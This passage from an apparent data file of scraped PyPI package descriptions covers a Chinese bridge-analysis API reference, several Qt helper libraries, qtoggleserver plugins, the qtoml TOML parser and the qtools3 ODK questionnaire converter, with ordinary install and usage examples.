\u65e0remove_beam_load\u5220\u9664\u6881\u5355\u5143\u8377\u8f7dArgs:case_name:\u8377\u8f7d\u5de5\u51b5\u540delement_id:\u5355\u5143\u53f7load_type:\u8377\u8f7d\u7c7b\u578bgroup_name:\u8fb9\u754c\u7ec4\u540dReturns: \u65e0add_initial_tension\u6dfb\u52a0\u521d\u59cb\u62c9\u529bArgs:element_id:\u5355\u5143\u7f16\u53f7case_name:\u8377\u8f7d\u5de5\u51b5\u540dgroup_name:\u8377\u8f7d\u7ec4\u540dtension:\u521d\u59cb\u62c9\u529btension_type:\u5f20\u62c9\u7c7b\u578bReturns: \u65e0add_cable_length_load\u6dfb\u52a0\u7d22\u957f\u5f20\u62c9Args:element_id:\u5355\u5143\u7c7b\u578bcase_name:\u8377\u8f7d\u5de5\u51b5\u540dgroup_name:\u8377\u8f7d\u7ec4\u540dlength:\u957f\u5ea6tension_type:\u5f20\u62c9\u7c7b\u578bReturns: 
\u65e0add_plate_element_load\u6dfb\u52a0\u7248\u5355\u5143\u8377\u8f7dArgs:element_id:\u5355\u5143idcase_name:\u8377\u8f7d\u5de5\u51b5\u540dload_type:\u8377\u8f7d\u7c7b\u578bload_place:\u8377\u8f7d\u4f4d\u7f6ecoord_system:\u5750\u6807\u7cfbgroup_name:\u8377\u8f7d\u7ec4\u540dload_info:\u8377\u8f7d\u4fe1\u606fReturns: \u65e0add_deviation_parameter\u6dfb\u52a0\u5236\u9020\u8bef\u5deeArgs:name:\u540d\u79f0element_type:\u5355\u5143\u7c7b\u578bparameter_info:\u53c2\u6570\u5217\u8868Returns: \u65e0add_deviation_load\u6dfb\u52a0\u5236\u9020\u8bef\u5dee\u8377\u8f7dArgs:element_id:\u5355\u5143\u7f16\u53f7case_name:\u8377\u8f7d\u5de5\u51b5\u540dparameter_name:\u53c2\u6570\u540dgroup_name:\u8377\u8f7d\u7ec4\u540dReturns: \u65e0add_element_temperature\u6dfb\u52a0\u5355\u5143\u6e29\u5ea6Args:element_id:\u5355\u5143\u7f16\u53f7case_name:\u8377\u8f7d\u5de5\u51b5\u540dtemperature:\u6e29\u5ea6group_name:\u8377\u8f7d\u7ec4\u540dReturns: \u65e0add_gradient_temperature\u6dfb\u52a0\u68af\u5ea6\u6e29\u5ea6element_id:\u5355\u5143\u7f16\u53f7case_name:\u8377\u8f7d\u5de5\u51b5\u540dtemperature:\u6e29\u5ea6section_oriental:\u622a\u9762\u65b9\u5411element_type:\u5355\u5143\u7c7b\u578bgroup_name:\u8377\u8f7d\u7ec4\u540dReturns: \u65e0add_beam_section_temperature\u6dfb\u52a0\u6881\u622a\u9762\u6e29\u5ea6Args:element_id:\u5355\u5143\u7f16\u53f7case_name:\u8377\u8f7d\u5de5\u51b5\u540dpaving_thick:\u94fa\u8bbe\u539a\u5ea6temperature_type:\u6e29\u5ea6\u7c7b\u578bpaving_type:\u94fa\u8bbe\u7c7b\u578bgroup_name:\u8377\u8f7d\u7ec4\u540dReturns: \u65e0add_index_temperature\u6dfb\u52a0\u6307\u6570\u6e29\u5ea6Args:element_id:\u5355\u5143\u7f16\u53f7case_name:\u8377\u8f7d\u5de5\u51b5\u540dtemperature:\u5355\u5143\u7c7b\u578bindex:\u6307\u6570group_name:\u8377\u8f7d\u7ec4\u540dReturns: \u65e0add_plate_temperature\u6dfb\u52a0\u9876\u677f\u6e29\u5ea6Args:element_id:\u5355\u5143\u7f16\u53f7case_name:\u8377\u8f7dtemperature:\u6e29\u5ea6group_name:\u8377\u8f7d\u7ec4\u540dReturns: \u65e0\u6c89\u964d\u64cd\u4f5cadd_sink_group\u6dfb\u52a0\u6c89\u964d\u7ec4Args:name: \u6c89\u964d\u7ec4\u540dsink: \u6c89\u964d\u503cnode_ids: \u8282\u70b9\u7f16\u53f7Returns: \u65e0remove_sink_group\u6309\u7167\u540d\u79f0\u5220\u9664\u6c89\u964d\u7ec4Args:name:\u6c89\u964d\u7ec4\u540d,\u9ed8\u8ba4\u5220\u9664\u6240\u6709\u6c89\u964d\u7ec4Returns: \u65e0add_sink_case\u6dfb\u52a0\u6c89\u964d\u5de5\u51b5Args:name:\u8377\u8f7d\u5de5\u51b5\u540dsink_groups:\u6c89\u964d\u7ec4\u540dReturns: \u65e0remove_sink_case\u6309\u7167\u540d\u79f0\u5220\u9664\u6c89\u964d\u5de5\u51b5,\u4e0d\u8f93\u5165\u540d\u79f0\u65f6\u9ed8\u8ba4\u5220\u9664\u6240\u6709\u6c89\u964d\u5de5\u51b5Args:name:\u6c89\u964d\u5de5\u51b5\u540dReturns: \u65e0add_concurrent_reaction\u6dfb\u52a0\u5e76\u53d1\u53cd\u529b\u7ec4Args:names: \u7ed3\u6784\u7ec4\u540d\u79f0\u96c6\u5408Returns: \u65e0remove_concurrent_reaction\u5220\u9664\u5e76\u53d1\u53cd\u529b\u7ec4Returns: \u65e0add_concurrent_force\u6dfb\u52a0\u5e76\u53d1\u5185\u529bReturns: \u65e0remove_concurrent_force\u5220\u9664\u5e76\u53d1\u5185\u529bReturns: \u65e0add_load_case\u6dfb\u52a0\u8377\u8f7d\u5de5\u51b5Args:index:\u6c89\u964d\u5de5\u51b5\u7f16\u53f7name:\u6c89\u964d\u540dload_case_type:\u8377\u8f7d\u5de5\u51b5\u7c7b\u578bReturns: \u65e0remove_load_case\u5220\u9664\u8377\u8f7d\u5de5\u51b5,\u53c2\u6570\u5747\u4e3a\u9ed8\u8ba4\u65f6\u5220\u9664\u5168\u90e8\u8377\u8f7d\u5de5\u51b5Args:index:\u8377\u8f7d\u7f16\u53f7name:\u8377\u8f7d\u540dReturns: \u65e0test_print\u6d4b\u8bd5\u8fd0\u884cReturns: 
\u65e0\u65bd\u5de5\u9636\u6bb5\u548c\u8377\u8f7d\u7ec4\u5408add_construction_stage\u6dfb\u52a0\u65bd\u5de5\u9636\u6bb5\u4fe1\u606fArgs:name:\u65bd\u5de5\u9636\u6bb5\u4fe1\u606fduration:\u65f6\u957factive_structures:\u6fc0\u6d3b\u7ed3\u6784\u7ec4\u4fe1\u606f [[\u7ed3\u6784\u7ec4\u540d\uff0c(int)\u9f84\u671f\uff0c\u65bd\u5de5\u9636\u6bb5\u540d\uff0c(int)1-\u53d8\u5f62\u6cd5 2-\u63a5\u7ebf\u6cd5 3-\u65e0\u5e94\u529b\u6cd5],...]delete_structures:\u949d\u5316\u7ed3\u6784\u7ec4\u4fe1\u606f [\u7ed3\u6784\u7ec41\uff0c\u7ed3\u6784\u7ec42,...]active_boundaries:\u6fc0\u6d3b\u8fb9\u754c\u7ec4\u4fe1\u606f [[\u8fb9\u754c\u7ec41\uff0c(int)1-\u53d8\u5f62\u524d 2-\u53d8\u5f62\u540e],...]delete_boundaries:\u949d\u5316\u8fb9\u754c\u7ec4\u4fe1\u606f [\u8fb9\u754c\u7ec41\uff0c\u7ed3\u6784\u7ec42,...]active_loads:\u6fc0\u6d3b\u8377\u8f7d\u7ec4\u4fe1\u606f [[\u8377\u8f7d\u7ec41,(int)0-\u5f00\u59cb 1-\u7ed3\u675f],...]delete_loads:\u949d\u5316\u8377\u8f7d\u7ec4\u4fe1\u606f [[\u8377\u8f7d\u7ec41,(int)0-\u5f00\u59cb 1-\u7ed3\u675f],...]temp_loads:\u4e34\u65f6\u8377\u8f7d\u4fe1\u606f [\u8377\u8f7d\u7ec41\uff0c\u8377\u8f7d\u7ec42,..]index:\u65bd\u5de5\u9636\u6bb5\u7f16\u53f7\uff0c\u9ed8\u8ba4\u81ea\u52a8\u6dfb\u52a0Returns: \u65e0remove_construction_stage\u6309\u7167\u65bd\u5de5\u9636\u6bb5\u540d\u5220\u9664\u65bd\u5de5\u9636\u6bb5Args:name:\u6240\u5220\u9664\u65bd\u5de5\u9636\u6bb5\u540d\u79f0Returns: \u65e0remove_all_construction_stage\u5220\u9664\u6240\u6709\u65bd\u5de5\u9636\u6bb5Returns: \u65e0add_load_combine\u6dfb\u52a0\u8377\u8f7d\u7ec4\u5408Args:name:\u8377\u8f7d\u7ec4\u5408\u540dcombine_type:\u8377\u8f7d\u7ec4\u5408\u7c7b\u578bdescribe:\u63cf\u8ff0combine_info:\u8377\u8f7d\u7ec4\u5408\u4fe1\u606fReturns: \u65e0remove_load_combine\u5220\u9664\u8377\u8f7d\u7ec4\u5408,\u53c2\u6570\u9ed8\u8ba4\u65f6\u5220\u9664\u6240\u6709\u8377\u8f7d\u7ec4\u5408Args:name:\u6240\u5220\u9664\u8377\u8f7d\u7ec4\u5408\u540dReturns: \u65e0\u53c2\u6570\u8bf4\u660echarm_info\u5012\u89d2\u5217\u8868\u4e2d\u4fe1\u606f\u542b\u4e49\u8be6\u89c1\u6865\u901a\u754c\u9762\u5b9a\u4e49\u754c\u9762\uff0c\u6240\u9700\u53c2\u6570\u7c7b\u578b\u5747\u4e3astr\u7c7b\u578b\u5012\u89d2\u5217\u8868\uff1a[C1,C2,C3,C4]section_info\u622a\u9762\u4fe1\u606f\u5404\u53d8\u91cf\u542b\u4e49\u8be6\u89c1\u6865\u901a\u622a\u9762\u5b9a\u4e49\u754c\u9762\uff0c\u4ee5\u4e0b\u6240\u9700\u53c2\u6570\u7c7b\u578b\u5747\u4e3afloat\u5355\u7bb1\u591a\u5ba4\u6df7\u51dd\u571f\u622a\u9762\uff1a[i1,i2,B0,B1,B1a,B1b,B2,B3,B4,H1,H2,H2a,H2b,T1,T2,T3,T4,R1,R2]\u77e9\u5f62\u622a\u9762\uff1a[W,H]\u5706\u5f62\u622a\u9762\uff1a [D]\u5706\u7ba1\u622a\u9762\uff1a [D,t]\u7bb1\u578b\u622a\u9762\uff1a [W,H,dw,tw,tt,tb]\u5b9e\u8179\u516b\u8fb9\u5f62\u622a\u9762\uff1a [a,b,W,H]\u7a7a\u8179\u516b\u8fb9\u5f62\uff1a [W,H,tw,tt,tb,a,b]\u5185\u516b\u89d2\u5f62\u622a\u9762\uff1a [W,H,tw,tt,tb,a,b]\u5b9e\u8179\u5706\u7aef\u5f62\u622a\u9762\uff1a [W,H]\u7a7a\u8179\u5706\u7aef\u5f62\u622a\u9762\uff1a [H,W,tw,tt]T\u5f62\u622a\u9762\uff1a [H,W,tw,tt]\u5012T\u5f62\u622a\u9762\uff1a [H,W,tw,tb]I\u5b57\u5f62\u622a\u9762\uff1a [Wt,Wb,H,tw,tt,tb]\u9a6c\u8e44T\u5f62\u622a\u9762\uff1a [H,tb,b2,b1,tt,tw,W,a2,a1]I\u5b57\u578b\u6df7\u51dd\u571f\u622a\u9762\uff1a [tb,Wb,H,b2,b1,tt,Wt,tw,a2,a1]\u94a2\u7ba1\u783c\uff1a [D,t,Es/Ec,Ds/Dc,Ts/Tc,vC,\u03bdS]\u94a2\u7bb1\u783c\uff1a 
[W,H,dw,tw,tt,tb,Es/Ec,Ds/Dc,Ts/Tc,vC,\u03bdS]steel_detail\u94a2\u7ede\u7ebf\uff1a[\u94a2\u675f\u9762\u79ef,\u5b54\u9053\u76f4\u5f84,\u6469\u963b\u7cfb\u6570,\u504f\u5dee\u7cfb\u6570]\u87ba\u7eb9\u94a2\u7b4b\uff1a[\u94a2\u7b4b\u76f4\u5f84,\u94a2\u675f\u9762\u79ef,\u5b54\u9053\u76f4\u5f84,\u6469\u963b\u7cfb\u6570,\u504f\u5dee\u7cfb\u6570,\u5f20\u62c9\u65b9\u5f0f]\u5173\u952e\u5b57\u5b9a\u4e49\u5750\u6807\u7cfb\u5173\u8054\u53c2\u6570\uff1a coord_systemGLB_X = 1 # \u6574\u4f53\u5750\u6807XGLB_Y = 2 # \u6574\u4f53\u5750\u6807YGLB_Z = 3 # \u6574\u4f53\u5750\u6807ZLOC_X = 4 # \u5c40\u90e8\u5750\u6807XLOC_Y = 5 # \u5c40\u90e8\u5750\u6807YLOC_Z = 6 # \u5c40\u90e8\u5750\u6807Z\u94a2\u675f\u5b9a\u4f4d\u65b9\u5f0f\u5173\u8054\u53c2\u6570\uff1aposition_typeTYP_STRAIGHT = 1 # \u76f4\u7ebfTYP_TRACK = 2 # \u8f68\u8ff9\u7ebf\u8377\u8f7d\u5de5\u51b5\u7c7b\u578b\u5173\u8054\u53c2\u6570\uff1aload_case_typeLD_CS = \"\u65bd\u5de5\u9636\u6bb5\u8377\u8f7d\" # ConstructionStageLD_DL = \"\u6052\u8f7d\" # DeadLoadLD_LL = \"\u6d3b\u8f7d\" # LiveLoadLD_BF = \"\u5236\u52a8\u529b\" # BrakingForceLD_WL = \"\u98ce\u8377\u8f7d\" # WindLoadLD_ST = \"\u4f53\u7cfb\u6e29\u5ea6\u8377\u8f7d\" # SystemTemperatureLD_GT = \"\u68af\u5ea6\u6e29\u5ea6\u8377\u8f7d\" # GradientTemperatureLD_RD = \"\u957f\u8f68\u4f38\u7f29\u6320\u66f2\u529b\u8377\u8f7d\" # RailDeformationLD_DE = \"\u8131\u8f68\u8377\u8f7d\" # DerailmentLD_SC = \"\u8239\u8236\u649e\u51fb\u8377\u8f7d\" # ShipCollisionLD_VC = \"\u6c7d\u8f66\u649e\u51fb\u8377\u8f7d\" # VehicleCollisionLD_RB = \"\u957f\u8f68\u65ad\u8f68\u529b\u8377\u8f7d\" # RailBreakingForceLD_UD = \"\u7528\u6237\u5b9a\u4e49\u8377\u8f7d\" # UserDefine"} +{"package": "qtmodern", "pacakge-description": "qtmodernis a Python package aimed to make PyQt/PySide applications look\nbetter and consistent on multiple platforms. It provides a custom frameless\nwindow and a dark theme. In order to be compatible with multiple Python Qt\nwrappersQtPyis used. The initial idea\ncomes fromthis project.InstallationThe recommended way to install is by usingpip, i.e:pip install qtmodernUsageIn order to useqtmodern, simply apply the style you want to your\napplication and then, create aModernWindowenclosing the window you want tomodernize:import qtmodern.styles\nimport qtmodern.windows\n\n...\n\napp = QApplication()\nwin = YourWindow()\n\nqtmodern.styles.dark(app)\nmw = qtmodern.windows.ModernWindow(win)\nmw.show()\n\n..."} +{"package": "qtmodernb", "pacakge-description": "Failed to fetch description. HTTP Status Code: 404"} +{"package": "qt-module-manager", "pacakge-description": "qt-module-managerA Qt widget to inspect all imported modules, and reload them. \u26a1Speed up your development \ud83d\ude80Featuresfilter submodules to only display base modules, e.g. showPySide2, but hidePySide2.QtWidgetsfilter by name to search for a module, e.g.numpyreload the selected module for faster developmentsearch modulessearch modules & submodules"} +{"package": "qtmonitor", "pacakge-description": "qtmonitorSimple tool for creating a Qt-Dialog with updating values.The idea behind the project was the necessity to monitor some real-time values\non a robotic-prototype. 
The package allows you to create a simple UI with\na lot of values, that are updating constantly at specified intervals,\nwithout any knowledge of QT / PySide packagesRepositoryPyPIPyPI TestSetupTo installqtmonitoruse pip or download it fromPyPI.pipinstallqtmonitorExampleThere is an example module, which demonstrates how to write your own monitor.\nFeel free to dig down and explore the code. The file is located underyou-python-packages-folder/qtmonitor/example.pyTo run and see it in action feel free to use following command:python-mqtmonitor.exampleUsageFirst of all, you need to create some python methods, which would return\nthe value, you want to track. Here is a simple random int generator method.\nIt will be used to demonstrate the module, there is no practical use for it.importrandomdefrandom_int_value():returnrandom.randrange(0,1000)The easiest way to create you own monitor is to subclass theqtmonitor.MonitorclassfromqtmonitorimportMonitorclassMyMonitor(Monitor):def__init__(self,parent=None):super(MyMonitor,self).__init__(parent)Now add at least one group to put your values in:fromqtmonitorimportMonitorclassMyMonitor(Monitor):def__init__(self,parent=None):super(MyMonitor,self).__init__(parent)grp=self.add_group('My group')Add the values to the group and run the tool.\nFeel free to use providedrunmethod:importrandomfromqtmonitorimportMonitordefrandom_int_value():returnrandom.randrange(0,1000)classMyMonitor(Monitor):def__init__(self,parent=None):super(MyMonitor,self).__init__(parent)grp=self.add_group('My group')grp.add_value('Value',random_int_value)grp.add_value('Value 10ms',random_int_value,interval=10)if__name__=='__main__':fromqtmonitorimportrunrun('My monitor',MyMonitor)"} +{"package": "qtm-rt", "pacakge-description": "For older versions, see \u201cqtm\u201d package."} +{"package": "qtMUD", "pacakge-description": "qtMUD is a framework for developing and hosting MUDs, or Multi-User Dungeons; text-based MMORPGs."} +{"package": "qt-multiprocessing", "pacakge-description": "# qt_multiprocessingLong running process that runs along side of the Qt event loop and allows other widgets to live in the other process.## Quick Start```pythonimport osimport qt_multiprocessingfrom qtpy import QtWidgetsclass MyPIDLabel(QtWidgets.QLabel):def print_pid(self):text = self.text()print(text, 'PID:', os.getpid())return textclass MyPIDLabelProxy(qt_multiprocessing.WidgetProxy):PROXY_CLASS = MyPIDLabelGETTERS = ['text']if __name__ == '__main__':with qt_multiprocessing.MpApplication() as app:print(\"Main PID:\", os.getpid())# Proxylbl = MyPIDLabelProxy(\"Hello\")widg = QtWidgets.QDialog()lay = QtWidgets.QFormLayout()widg.setLayout(lay)# Forminp = QtWidgets.QLineEdit()btn = QtWidgets.QPushButton('Set Text')lay.addRow(inp, btn)def set_text():text = inp.text()lbl.setText(inp.text())# Try to somewhat prove that the label is in a different process.# `print_pid` Not exposed (will call in other process. Result will be None)print('Set Label text', text + '. 
Label text in this process', lbl.print_pid())# `print_pid` will run in a separate process and print the pid.btn.clicked.connect(set_text)widg.show()```Below is an example for if you want to manually create widgets in a different process without the proxy.```pythonimport osimport qt_multiprocessingfrom qtpy import QtWidgetsclass MyPIDLabel(QtWidgets.QLabel):def print_pid(self):text = self.text()print(text, 'PID:', os.getpid())return textdef create_process_widgets():lbl = MyPIDLabel('Hello')lbl.show()return {'label': lbl}if __name__ == '__main__':with qt_multiprocessing.MpApplication(initialize_process=create_process_widgets) as app:print(\"Main PID:\", os.getpid())widg = QtWidgets.QDialog()lay = QtWidgets.QFormLayout()widg.setLayout(lay)# Forminp = QtWidgets.QLineEdit()btn = QtWidgets.QPushButton('Set Text')lay.addRow(inp, btn)def set_text():text = inp.text()app.add_var_event('label', 'setText', text)# The label does not exist in this process at all. Can only access by string namesprint('Set Label text', text + '.')# `print_pid` will run in a separate process and print the pid.app.add_var_event('label', 'print_pid')btn.clicked.connect(set_text)widg.show()```## How it worksThis library works by creating an event loop in a separate process while the Qt application is running in the mainprocess. This library is built off of the mp_event_loop library which creates a long running process where events arethrown on a queue and executed in a separate process. The other process that is created also runs it's own Qtapplication while executing events in a timer.This library has the ability to:* dynamic creation of widgets in a separate process* Run methods of widgets in a separate process through variable names* Proxy widgets## Manual ExampleThis example shows how everything comes together manually```pythonimport osimport qt_multiprocessingfrom qtpy import QtWidgetsclass MyPIDLabel(QtWidgets.QLabel):def print_pid(self):text = self.text()print(text, 'PID:', os.getpid())return textdef create_process_widgets():lbl = MyPIDLabel('Hello')lbl.show()return {'label': lbl}if __name__ == '__main__':app = QtWidgets.QApplication([])mp_loop = qt_multiprocessing.AppEventLoop(initialize_process=create_process_widgets)print(\"Main PID:\", os.getpid())widg = QtWidgets.QDialog()lay = QtWidgets.QFormLayout()widg.setLayout(lay)# Forminp = QtWidgets.QLineEdit()btn = QtWidgets.QPushButton('Set Text')lay.addRow(inp, btn)def set_text():text = inp.text()mp_loop.add_var_event('label', 'setText', text)# The label does not exist in this process at all. Can only access by string namesprint('Set Label text', text + '.')# `print_pid` will run in a separate process and print the pid.mp_loop.add_var_event('label', 'print_pid')btn.clicked.connect(set_text)widg.show()# Run the multiprocessing event loopmp_loop.start()# Run the application event loopapp.exec_()# Quit the multiprocessing event loop when the app closesmp_loop.close()```"} +{"package": "qtnanester", "pacakge-description": "No description available on PyPI."} +{"package": "qtneat", "pacakge-description": "qtneatDON'T USE IT. 
I'M STILL WORKINGSet the Qt frameless titlebar/theme easilyRequirementsPyQt5 >= 5.8Included Packagesqtawesomepyqt-svg-buttonpyqt-svg-icon-text-widgetSetuppython -m pip install qtneatExamplefromPyQt5.QtWidgetsimportQApplicationfrompyqt_timer.settingsDialogimportSettingsDialogfromqtneatimportprepareQtApp,QtAppManagerif__name__==\"__main__\":importsysprepareQtApp()a=QApplication(sys.argv)w=SettingsDialog()m=QtAppManager(w)m.setTheme(theme='#6f478d')m.setTitleBar(icon_filename='settings.svg')m.show()a.exec()Result"} +{"package": "qt_nester", "pacakge-description": "UNKNOWN"} +{"package": "qt_object_viewer", "pacakge-description": "This Python package provides a Qt based widget and a dialog class for exploring a\nnested object structure.For examples see:http://github.com/uweschmitt/qt_object_viewer.git"} +{"package": "qtodotxt", "pacakge-description": "No description available on PyPI."} +{"package": "qtodotxt2", "pacakge-description": "No description available on PyPI."} +{"package": "qtoggleserver", "pacakge-description": "No description available on PyPI."} +{"package": "qtoggleserver-cmdline", "pacakge-description": "No description available on PyPI."} +{"package": "qtoggleserver-dallastemp", "pacakge-description": "No description available on PyPI."} +{"package": "qtoggleserver-eq3bt", "pacakge-description": "No description available on PyPI."} +{"package": "qtoggleserver-generic-http", "pacakge-description": "No description available on PyPI."} +{"package": "qtoggleserver-modbus", "pacakge-description": "No description available on PyPI."} +{"package": "qtoggleserver-mppsolar", "pacakge-description": "No description available on PyPI."} +{"package": "qtoggleserver-mqtt", "pacakge-description": "No description available on PyPI."} +{"package": "qtoggleserver-paradox", "pacakge-description": "No description available on PyPI."} +{"package": "qtoggleserver-pushover", "pacakge-description": "No description available on PyPI."} +{"package": "qtoggleserver-pylontech", "pacakge-description": "No description available on PyPI."} +{"package": "qtoggleserver-raspigpio", "pacakge-description": "No description available on PyPI."} +{"package": "qtoggleserver-rpigpio", "pacakge-description": "No description available on PyPI."} +{"package": "qtoggleserver-thingspeak", "pacakge-description": "No description available on PyPI."} +{"package": "qtoggleserver-zigbee2mqtt", "pacakge-description": "No description available on PyPI."} +{"package": "qtoml", "pacakge-description": "qtoml is another Python TOML encoder/decoder. I wrote it because I found\nuiri/toml too unstable, and PyTOML too slow.For information concerning the TOML language, seetoml-lang/toml.qtoml currently supports TOML v0.5.0.Usageqtoml is available onPyPI. You can install\nit using pip:$pipinstallqtomlqtoml supports the standardload/loads/dump/dumpsAPI common to\nmost similar modules. Usage:>>>importqtoml>>>toml_string=\"\"\"...test_value = 7...\"\"\">>>qtoml.loads(toml_string){'test_value': 7}>>>print(qtoml.dumps({'a':4,'b':5.0}))a = 4\nb = 5.0>>>infile=open('filename.toml','r')>>>parsed_structure=qtoml.load(infile)>>>outfile=open('new_filename.toml','w')>>>qtoml.dump(parsed_structure,outfile)TOML supports a fairly complete subset of the Python data model, but notably\ndoes not include a null orNonevalue. 
If you have a large dictionary from\nsomewhere else includingNonevalues, it can occasionally be useful to\nsubstitute them on encode:>>>print(qtoml.dumps({'none':None}))qtoml.encoder.TOMLEncodeError: TOML cannot encode None>>>print(qtoml.dumps({'none':None},encode_none='None'))none = 'None'Theencode_nonevalue must be a replacement encodable by TOML, such as zero\nor a string.This breaks reversibility of the encoding, by renderingNonevalues\nindistinguishable from literal occurrences of whatever sentinel you chose. Thus,\nit should not be used when exact representations are critical.Development/testingqtoml uses thepoetrytool for project\nmanagement. To check out the project for development, run:$gitclone--recurse-submoduleshttps://github.com/alethiophile/qtoml$cdqtoml$poetryinstallThis assumes poetry is already installed. The package and dependencies will be\ninstalled in the currently active virtualenv if there is one, or a\nproject-specific new one created if not.qtoml is tested against thealethiophile/toml-testtest suite, forked from uiri\u2019s\nfork of the original by BurntSushi. To run the tests, after checking out the\nproject as shown above, enter thetestsdirectory and run:$pytest# if you already had a virtualenv active$poetryrunpytest# if you didn'tLicenseThis project is available under the terms of the MIT license."} +{"package": "qtoolkit", "pacakge-description": "Full Documentation[!WARNING]\n\ud83d\udea7 This repository is still under construction. \ud83d\udea7Need help?Ask questions about QToolKit on theQToolKit support forum.\nIf you've found an issue with QToolKit, please submit a bug report onGitHub Issues.What\u2019s new?Track changes to qtoolkit through thechangelog.ContributingWe greatly appreciate any contributions in the form of a pull request.\nAdditional information on contributing to QToolKit can be foundhere.\nWe maintain a list of all contributorshere.Code of conductHelp us keep QToolKit open and inclusive.\nPlease read and follow ourCode of Conduct.LicenseQToolKit is released under a modified BSD license; the full text can be foundhere.AcknowledgementsQToolKit is developed and maintained by Matgenix SRL.A full list of all contributors can be foundhere."} +{"package": "qtools", "pacakge-description": "Python tools for Qt."} +{"package": "qtools3", "pacakge-description": "qtools3- Questionnaire Tools for ODKThis softwareqtools3provides tools and utilities for dealing with PMA\nquestionnaires. It converts the XLSForms to XML and then does all appropriate\nedits. It also can be used as a simple XLSForm Offline converter.The softwareqtools3is an upgrade fromqtools2. The primary purpose for this\nupgrade is to port the software from Python 2 to Python 3. This was made\npossible because thecommunity's PyXFormadded Python 3 support in 2018.Pre-requisitesThe softwareqtools3relies on Python 3 for core functionality and Java for\nODKValidate. The steps to install areInstall the most recent version of theJava JRE.InstallPython 3.6or higher.Note: the author usesHomebrewfor Python installation on Mac.Windows-specific stepsSome difficulties arise ifpythonandpipare not be added automatically\nto thePATHupon installation. 
For instructions on how to do this, consultthis document.OpenCMD(click start menu, typeCMD, press enter).cd C:\\Python36\\ScriptsContinue with installation or upgrade...InstallationNOTE: Windows users start with theWindows-specifc stepssection.On a terminal or CMD, runpython3 -m pip install qtools3For the latest and greatest, install directly from githubpython3 -m pip install https://github.com/PMA-2020/qtools3/zipball/masterCommand-line usageBesides being the workhorse ofqtools3, the moduleqtools3.convertalso provides a command-line utility. New-style linking (with all instructions contained inside the XLSForm) is now the default. Old-style linking (line-by-line manual XML editing instructions) is removed. To see help files and usage, run in the terminalpython -m qtools3.convert --helpQuick-start guideType of conversionCommandPMA form conversionpython -m qtools3.convert FILENAME [FILENAME ...]XLSForm-Offline equivalent, convert and validatepython -m qtools3.convert -ril FILENAME [FILENAME ...]OptionsShort FlagLong FlagDescription-r--regularThis flag indicates the program should convert to XForm and not try to enforce PMA-specific naming conventions or make linking checks for HQ and FQ.-p--preexistingInclude this flag to prevent overwriting pre-existing files.-n--novalidateDo not validate XML output with ODK Validate. Do not perform extra checks on (1) data in undefined columns, (2) out of order variable references.-i--ignore_versionIgnore versioning in filename, form_id, form_title, and save_form. In other words, the default (without this flag) is to ensure version consistency.-l--linking_warnProduce warnings for incorrect linking directives. Default is to raise an exception and halt the program.-d--debugShow debug information. Helpful for squashing bugs.-e--extrasPerform extra checks on (1) data in undefined columns and (2) out of order variable references.-s--suffixA suffix to add to the base file name. Cannot start with a hyphen (\"-\").ExtrasTranslation Regex MismatchesTheseqtools3conversion warning messages appear whenever there is a discrepancy between translations with respect to numbering, i.e.'[0-9]+', and/or variables, i.e.'${...}'.Example - Numbering MismatchIn this example, the warning'[0-9]+'will appear, because \"0\" is not the same things as \"zero\". To fix this, please ensure that ALL languages use only arabic numerals (e.g. 1, 2, 3...), or only word-based numbering (e.g. one, two, three...).English: Please enter 0.Bad Pidgin English: Please enter zero.Example - Variable MismatchODK variables should never be translated. If the main language shows \"${months}\", all language translations should also show \"${months}\". Of course, what the user sees on the phone will still be translated.English: Enter ${months}.Bad French: Entrez ${mois}.Example - Variable MismatchTranslations should use all variables that the English uses.English: There are ${hh_count} people in the householdBad Pidgin English: There are (ODK will fill in a count) people in the householdUpdatesNOTE: Windows users start with theWindows-specifc stepssection. To installqtools3updates, usepython3 -m pip install qtools3 --upgradeFor the latest and greatest, replacemasterin the URLs above withdevelop.Every once in a while, it will be necessary to updatepmaxform3. 
To do this, usepython3 -m pip install pmaxform3 --upgradeSuggestions and GotchasCheck the version in the terminal to see if a program is installed.Check Java version withjavac -versionCheck Python version withpython -V.Check pip version withpip -V.Another executable for Python ispython3.Another executable forpipispip3.The most recent Java is not required, but successful tests have only been run with Java 1.6 through Java 1.8.A dependency ofpmaxformislxml, which can cause problems on Mac. If there are problems, the best guide is onStackOverflow.During installation ofpmaxformon Mac, the user may be prompted to install Xcode's Command Line Tools. This should be enough forlxml.qtools3may run without Java. Java is only needed for ODK Validate, which can be bypassed by using the \"No validate\" option.Xcode 9 presents issues with missing header files. If at all possible, install Xcode 8.QTools2: Outils de questionnaire pour ODKQtools2 fournit des outils et des utilitaires permettant de traiter les questionnaires PMA2020. Il convertit les XLSForms en XML, puis effectue toutes les modifications appropri\u00e9es. Il peut \u00e9galement \u00eatre utilis\u00e9 comme un convertisseur XLSForm Offline simple.Le code est n\u00e9cessairement \u00e9crit pour Python 2 car il d\u00e9pend d'un embranchement du [PyXForm de la communaut\u00e9]1a(l\u2019embranchement s'appelle [pmaxform]1b) pour convertir les documents MS-Excel en XML. Nous devons juste apprendre \u00e0 vivre avec cette contrari\u00e9t\u00e9.Conditions pr\u00e9alablesQTools2 repose sur Python 2 pour les fonctionnalit\u00e9s principales et Java pour ODKValidate. Les \u00e9tapes pour installer sontInstallez la version la plus r\u00e9cente de [Java]2(actuellement 1.8). ~~ Le JRE ou le JDK devrait fonctionner. ~ Seul le JDK fonctionnait lors du dernier test sur Mac (mars 2017).Installez [Python 2.7]3.Remarque: l'auteur utilise [Homebrew]4pour l'installation de Python sur Mac.Windows-specific stepsSome difficulties arise ifpythonandpipare not be added automatically to thePATHupon installation. OpenCMD(click start menu, typeCMD, press enter). Naviagate to yourpipexecutable, probably here:cd C:\\Python27\\ScriptsContinue with installation or upgrade...InstallationNOTE: Windows users start with theWindows-specifc stepssection. This package uses a modified version ofpyxformcalledpmaxformbecause the PyXForm project thus far has refused to accept this author's pull requests for some simple improvements. Therefore, installation requirestwocommands instead ofone. Open CMD or Terminal and install relevant packagesseparately, andin orderFirst,pip install https://github.com/jkpr/pmaxform/zipball/masterSecond,pip install https://github.com/jkpr/QTools2/zipball/masterFor the latest and greatest, replacemasterin the URLs above withdevelop.\u00e9tapes sp\u00e9cifiques \u00e0 WindowsCertaines difficult\u00e9s surviennent sipythonetpipne sont pas ajout\u00e9s automatiquement auPATHlors de l'installation. OuvrezCMD(cliquez sur le menu de d\u00e9marrage, tapezCMD, appuyez sur Entr\u00e9e).Acc\u00e9dez \u00e0 votre ex\u00e9cutablepip, probablement ici:cd C: \\ Python27 \\ ScriptsContinuer l'installation ou la mise \u00e0 niveau 